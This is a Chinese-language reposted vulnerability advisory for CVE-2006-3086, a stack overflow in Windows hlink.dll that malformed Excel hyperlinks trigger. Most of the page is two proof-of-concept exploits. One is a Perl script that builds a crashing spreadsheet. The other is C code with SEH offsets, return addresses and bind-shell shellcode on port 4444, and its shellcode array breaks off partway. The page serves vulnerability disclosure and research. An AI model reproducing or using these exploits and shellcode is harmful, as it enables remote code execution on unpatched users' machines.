Microsoft HLINK.DLL链接内存破坏漏洞

2008-04-09 04:16:59来源：互联网阅读 ()

Microsoft HLINK.DLL链接内存破坏漏洞

发布日期：2006-06-14
更新日期：2006-06-30

受影响系统：

Microsoft Windows XP
Microsoft Windows Server 2003
Microsoft Windows 2000

描述：

BUGTRAQ ID: 18500
CVE(CAN) ID: CVE-2006-3086

Microsoft Windows是微软发布的非常流行的操作系统。

Microsoft Windows的hlink.dll在处理超级链接时存在栈溢出漏洞。攻击者可以诱骗用户访问恶意Excel文档中的特制超级链接来触发这个漏洞，导致执行任意代码。

<*来源：Mike Reavey
kcope （kingcope@gmx.net）

链接：http://secunia.com/advisories/20748/print/
http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspx
http://www.kb.cert.org/vuls/id/394444
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Exploit 1

###############################
# excelsexywarez.pl
# excel unicode overflow poc
# by kcope in 2006
# thanks to revoguard and alex
###############################
use Spreadsheet::WriteExcel;

my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");

$worksheet = $workbook->add_worksheet();

$format = $workbook->add_format();
$format->set_bold();
$format->set_color('red');
$format->set_align('center');

$col = $row = 5;
$worksheet->write($row, $col, "kcope in da house! Click on the link!!!", $format);

$a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500;
$worksheet->write_url(0, 0, "$a", "LINK");

Exploit 2

/*---------------------------------------------------------------------
*
* Microsoft Excel Remote Code Execution Proof Of Concept.
* Tested against : Excel 2000 on Win XP SP1 , and Win2000 SP4
* Description:
* Microsoft Excel is prone to a remote code execution issue
* which may be triggered when a malformed Excel document is opened.
* The issue is due to an error in Excel while handling malformed URL
* strings. there may be other ways to trigger this vulnerability,
* successful exploitation could allow an attacker to execute
* arbitrary code with the privileges of the user running Excel.
*
* Code execution is dependent upon certain factors including the
* overflow condition, the MS Excel version and the host OS and SP.
* If you cannot get it to work, attach it with the debugger check
* the stack layout and the rest is on your imagination. :) :)
*
* Compile with MS VC or g ,it will generate the Excel file
* Clicking the link in the file binds the shell ,
* C:\nc localhost 4444
*
* Advisories:
* http://www.microsoft.com/technet/security/advisory/921365.mspx
* http://www.securityfocus.com/bid/18422/
*
* Disclaimer:
* This Proof of concept code is for educational purposes only.
* Please do not use it against any system without authorization..
*
* Greetings:
* To all Pakistani Hackers and "script kiddies" :O :O :O
* Special thanks to salman bro.
*
* --//
* naveed afzal
*--------------------------------------------------------------------------*/

#include <string.h>
#include <fstream.h>
#include <stdio.h>

unsigned char ret_address[]="\x77\xF5\x76\xDE"; // WinXP SP1(english) pop/pop/ret in NTDLL.DLL

//unsigned char ret_address[]="\x77\xF9\x2A\x9B"; // Win2K SP4(english) jmp ebx

int seh_off = 4855; //SEH offset from the start of our buffer
//For win2k it maybe 24
//Check it in your debugger

int buff_size = 0x152E; //approximate your buffer size to fill the stack beyond SEH
//it is variant for different Excel versions
//so again consult your debugger

// win32_bind - Shellcode , port = 4444 , thanks to http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有